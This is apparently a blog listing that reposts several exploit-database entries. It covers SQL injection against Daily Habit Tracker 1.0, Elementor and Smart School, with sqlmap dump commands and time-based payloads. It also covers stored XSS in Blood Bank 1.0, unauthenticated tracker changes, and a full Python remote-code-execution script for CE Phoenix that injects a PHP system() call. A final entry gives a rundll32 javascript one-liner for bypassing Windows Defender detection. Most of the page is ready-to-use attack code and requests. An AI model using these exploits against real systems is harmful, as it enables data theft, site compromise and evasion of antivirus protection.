    # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > delete-tracker.php ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` ![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true) ### SQLMap Save the following request to `delete_tracker.txt`: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
  20. HireHackking

    Blood Bank v1.0 - Stored Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile. Vulnerable File: updateprofile.php Parameters: rename, remail, rphone, rcity # Proof of Concept: ---------------------- 1. Intercept the POST request to updateprofile.php via Burp Suite 2. Inject the payload to the vulnerable parameters 3. Payload: "><svg/onload=alert(document.domain)> 4. Example request for rname parameter: --- POST /bloodbank/file/updateprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/rprofile.php?id=1 Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update ---- 5. Go to the profile page and trigger the XSS XSS Payload: "><svg/onload=alert(document.domain)>
  21. HireHackking

    Daily Habit Tracker 1.0 - Broken Access Control

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-tracker.php, delete-tracker.php, update-tracker.php ### Description: > Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials. ## Proof of Concept: ### Unauthenticated Access to Home page > To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page. ### Create Tracker as Unauthenticated User To create a tracker, use the following request: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ### Update Tracker as Unauthenticated User To update a tracker, use the following request: ``` POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes ``` ### Delete Tracker as Unauthenticated User: To delete a tracker, use the following request: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
  22. HireHackking

    Elementor Website Builder < 3.12.2 - Admin+ SQLi

    HireHackking posted a blog entry in Hacker Technology
    #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders #Open Burp Suite. #In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. #Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. #Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. #On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": #code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# #Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request. #Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward". #The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection. #Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s # #References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/ #Exploit Python : #The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: #This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection. #Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payload url = "http://localhost:8080/wp-admin/admin-ajax.php" data = { "action": "elementor_ajax_save_builder", "editor_post_id": "1", "post_id": "1", "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#" } # Send the request to the target URL response = requests.post(url, data=data) # Check if the response indicates a successful SQL injection if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text: print("SQL Injection successful!") else: print("SQL Injection failed.")
  23. HireHackking

    Smart School 6.4.1 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Smart School 6.4.1 - SQL Injection # Exploit Author: CraCkEr # Date: 28/09/2023 # Vendor: QDocs - qdocs.net # Vendor Homepage: https://smart-school.in/ # Software Link: https://demo.smart-school.in/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-5495 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /course/filterRecords/ POST Parameter 'searchdata[0][title]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi] ------------------------------------------- POST /course/filterRecords/ HTTP/1.1 searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3 ------------------------------------------- searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi] Path: /course/filterRecords/ POST Parameter 'searchdata[0][title]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi POST Parameter 'searchdata[1][title]' is vulnerable to SQLi POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi --- Parameter: searchdata[0][title] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[0][searchvalue] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[1][title] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low Parameter: searchdata[1][searchvalue] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z --- ------------------------------------------- POST /course/filterRecords/ HTTP/1.1 searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi] ------------------------------------------- Path: /online_admission --- Parameter: MULTIPART email ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385-- --- POST Parameter 'email' is vulnerable to SQLi POST /online_admission HTTP/1.1 -----------------------------320375734131102816923531485385 Content-Disposition: form-data; name="email" *[SQLi] -----------------------------320375734131102816923531485385 [-] Done
  24. HireHackking

    CE Phoenix v1.0.8.20 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ## EXPLOIT : import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CGREEN = '\33[32m' CYELLOW = '\33[33m' CBLUE = '\33[34m' CVIOLET = '\33[35m' CBEIGE = '\33[36m' CWHITE = '\33[37m' def entry_banner(): color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random) banner = color_random[0] + """ CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr """ for char in banner: print(char, end='') sys.stdout.flush() sleep(0.0045) def get_formid_and_cookies(session, url): response = session.get(url, allow_redirects=True) if response.ok: soup = BeautifulSoup(response.text, 'html.parser') formid_input = soup.find('input', {'name': 'formid'}) if formid_input: return formid_input['value'], session.cookies return None, None def perform_exploit(session, url, username, password, command): print("\n[+] Attempting to exploit the target...") initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php" formid, cookies = get_formid_and_cookies(session, initial_url) if not formid: print("[-] Failed to retrieve initial formid.") return # Login print("[+] Performing login...") login_payload = { 'formid': formid, 'username': username, 'password': password } login_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': initial_url } login_url = url + "/admin/login.php?action=process" login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True) if not login_response.ok: print("[-] Login failed.") print(login_response.text) return print("[+] Login successful.") new_formid, _ = get_formid_and_cookies(session, login_response.url) if not new_formid: print("[-] Failed to retrieve new formid after login.") return # Exploit print("[+] Executing the exploit...") encoded_command = urllib.parse.quote_plus(command) exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B" exploit_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': login_response.url } exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save" exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True) if exploit_response.ok: print("[+] Exploit executed successfully.") else: print("[-] Exploit failed.") print(exploit_response.text) final_response = session.get(url) print("\n[+] Executed Command Output:\n") print(final_response.text) def main(base_url, username, password, command): print("\n[+] Starting the exploitation process...") session = requests.Session() perform_exploit(session, base_url, username, password, command) if __name__ == "__main__": entry_banner() if len(sys.argv) < 5: print("Usage: python script.py [URL] [username] [password] [command]") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] command = sys.argv[4] main(base_url, username, password, command)
  25. HireHackking

    Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G

    HireHackking posted a blog entry in Hacker Technology
    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again. The fix was short lived as I find yet another third trivial bypass soon after. [Exploit/POC] Open command prompt as Administrator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13) Access is denied. C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX') [Video PoC URL] https://www.youtube.com/watch?v=yn9gdJ7c7Kg [Network Access] Local [Severity] High [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt https://twitter.com/hyp3rlinx/status/1755417914599956833 https://twitter.com/hyp3rlinx/status/1758624140213264601 [Disclosure Timeline] Vendor Notification: February 16, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx